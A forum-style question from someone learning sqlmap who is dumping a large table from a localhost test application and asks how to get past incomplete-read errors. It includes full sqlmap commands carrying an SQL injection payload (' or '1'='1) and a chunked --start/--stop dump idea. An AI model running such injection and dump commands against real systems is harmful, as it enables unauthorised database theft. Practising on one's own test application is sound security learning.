
I am learning sqlmap and was trying to dump a large table with about 11K entries from a test application on my localhost.

The command I used is:

python sqlmap.py -u "http://localhost/searchre.php" --data="search=' or '1'='1" 
--delay=10 --timeout=100 --random-agent --dump -D Animal -T types --keep-alive --threads=5

It is supposed to dump the types table from the Animal database.

[12:29:36] [INFO] the SQL query used returns 11681 entries

[12:29:36] [INFO] starting 5 threads

[12:29:48] [CRITICAL] there was an incomplete read error while retrieving data 
from the target URL or proxy. sqlmap is going to retry the request(s)

[12:29:48] [WARNING] if the problem persists please try to lower the number of 
used threads (option '--threads')

I tried lowering the number of threads, but to no avail. What should I do in a scenario where the table is this large?
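In case it helps, this is the kind of chunked approach I was considering as a workaround (assuming I understand the --start/--stop options correctly); I have not confirmed that it avoids the error:

```shell
# Idea (untested): dump the table in smaller ranges with --start/--stop so a
# single incomplete-read failure loses less work. sqlmap keeps a session file,
# so re-running the same command should resume already-retrieved entries.
python sqlmap.py -u "http://localhost/searchre.php" \
    --data="search=' or '1'='1" \
    --random-agent --keep-alive --threads=1 \
    -D Animal -T types --dump \
    --start=1 --stop=1000
# ...then repeat with --start=1001 --stop=2000, and so on.
```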
